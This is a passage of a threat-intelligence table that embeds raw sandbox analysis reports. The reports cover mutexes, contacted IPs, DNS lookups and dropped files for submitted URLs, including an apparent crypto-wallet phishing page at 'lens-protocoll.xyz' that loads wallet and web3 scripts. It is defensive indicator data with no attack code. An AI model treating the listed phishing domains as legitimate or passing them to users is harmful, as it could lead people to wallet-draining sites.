"IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "m_el_main_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_D809339D-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D809339B-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "X2WYMCV5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X2WYMCV5.txt]- [targetUID: 00000000-00002768]\n "DEW9N13E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEW9N13E.txt]- [targetUID: 00000000-00003116]\n "_E2C1FED7-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1NX8I2I6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NX8I2I6.txt]- [targetUID: 00000000-00002768]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "UX69Y2OK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UX69Y2OK.txt]- [targetUID: 00000000-00003116]\n "BQ7YREAH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BQ7YREAH.txt]- [targetUID: 00000000-00003116]\n "~DF7ADEEE89A7F7CB7A.TMP" has type "data"- Location: [%TEMP%\\~DF7ADEEE89A7F7CB7A.TMP]- [targetUID: 00000000-00002768]\n "C1BNT20A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1BNT20A.txt]- [targetUID: 00000000-00002768]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document 
File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "m_navigationui_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002768]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.google.com/support/translate+(en==Hn?:#googtrans/en/+Hn);var"\n Pattern match: "https://www.google.com/tools/feedback},Tw=function(a){return"\n Pattern match: "https://github.com/madler/zlib/blob/master/zlib.h"\n Pattern match: "https://www.google.com/images/cleardot.gif"\n Pattern match: "https://==Pn?V.Gh:null};this.Z={qb:Un,xd:null};a&&"\n Pattern match: "V.Pb/\ufffd\u0331"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "https://www&google.com/images/zippy_minus_sm.gif"\n Pattern match: "http://www.w3.org/TR/selectors/#attribute-selectors"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#attribute-selectors"\n Pattern match: "https://developer.mozilla.org/en/Security/CSP"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#escaped-characters"\n Pattern match: "http://bugs.jquery.com/ticket/12282#comment:15"\n Pattern match: "http://blindsignals.com/index.php/2009/07/jquery-delay/"\n Pattern match: "http://bugs.jquery.com/ticket/12359"\n Pattern match: 
"http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291"\n Pattern match: "http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/"\n Pattern match: "http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)"\n Pattern match: "http://javascript.nwbox.com/IEContentLoaded/"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx"\n Pattern match: "http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context"\n Pattern match: "http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html"\n Pattern match: "http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked"\n Pattern match: "http://www.w3.org/TR/css3-syntax/#characters"\n Pattern match: "http://www.w3.org/TR/selectors/#empty-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#lang-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#pseudo-classes"\n Pattern match: "https://github.com/jquery/jquery/pull/764"\n Pattern match: "http://json.org/json2.js"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=491668"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier"\n Pattern match: "https://developer.mozilla.org/en-US/docs/CSS/display"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=649285"\n Pattern match: "http://dev.w3.org/csswg/cssom/#resolved-values"\n Pattern match: "http://jsperf.com/getall-vs-sizzle/2"\n Pattern match: "https://bugs.webkit.org/show_bug.cgi?id=29084"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#whitespace"\n Pattern match: "https://bafybeia3mpocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a.ipfs.dweb.link/"\n Pattern match: "https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-US&client=wt"\n Pattern match: 
"https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/exm=corsproxy/ed=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=navigationui"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=corsproxy"\n Pattern match: "https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog\\]]],null,null,null,null,null,null,-3600,null,null,null,null,[],1,nu |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 1 | 0 | 3 | 0 | None | 007316.xyz | 007316.xyz |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:8080 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:22 | 87.248.157.102 |
| 2023-05-12 02:52:41 | Raw Data from RIRs | No | Hybrid Analysis | 3 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n 
"imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has 
type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 | 185.199.108.153 |
| 2023-05-12 02:56:36 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'54.196.16.164'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://hilarious-kelpie-473db1.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd"\n "www.herokucdn.com"\n "o.ss2.us"\n "crl.rootg2.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "crl.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d00_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_d00_ConnHashTable<3328>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d00_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d00_IESQMMUTEX_0_519"\n "IsoScope_d00_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3328"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d00_IE_EarlyTabStart_0x424_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "54.196.16.164:80"\n "99.84.238.168:80"\n "99.84.238.168:443"\n "99.84.224.224:80"\n "99.84.224.90:80"\n "99.84.224.108:80"\n "99.84.224.214:80"\n "99.84.224.3:80"\n "99.84.224.217:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"TR7K5OKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TR7K5OKT.txt]- [targetUID: 00000000-00003328]\n "73DA0AE306CF69ADAC457DB6B2997338" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00001732]\n "~DFC7FE55AAA15340B0.TMP" has type "data"- Location: [%TEMP%\\~DFC7FE55AAA15340B0.TMP]- [targetUID: 00000000-00003328]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00003328]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00003328]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00001732]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00001732]\n "2C9HMCBU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2C9HMCBU.txt]- [targetUID: 00000000-00003328]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003328]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00001732]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00001732]\n 
"7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003328]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003328]\n "BCB67D7ECB470284AF35679F339E879F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BCB67D7ECB470284AF35679F339E879F]- [targetUID: 00000000-00001732]\n "~DF9154BC8BBA72FEBA.TMP" has type "data"- Location: [%TEMP%\\~DF9154BC8BBA72FEBA.TMP]- [targetUID: 00000000-00003328]\n "FVK5E2PX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FVK5E2PX.txt]- [targetUID: 00000000-00003328]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003328]\n "~DF4D25D5B6C6F1C182.TMP" has type "data"- Location: [%TEMP%\\~DF4D25D5B6C6F1C182.TMP]- [targetUID: 00000000-00003328]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd" seems to be random\n "www.herokucdn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 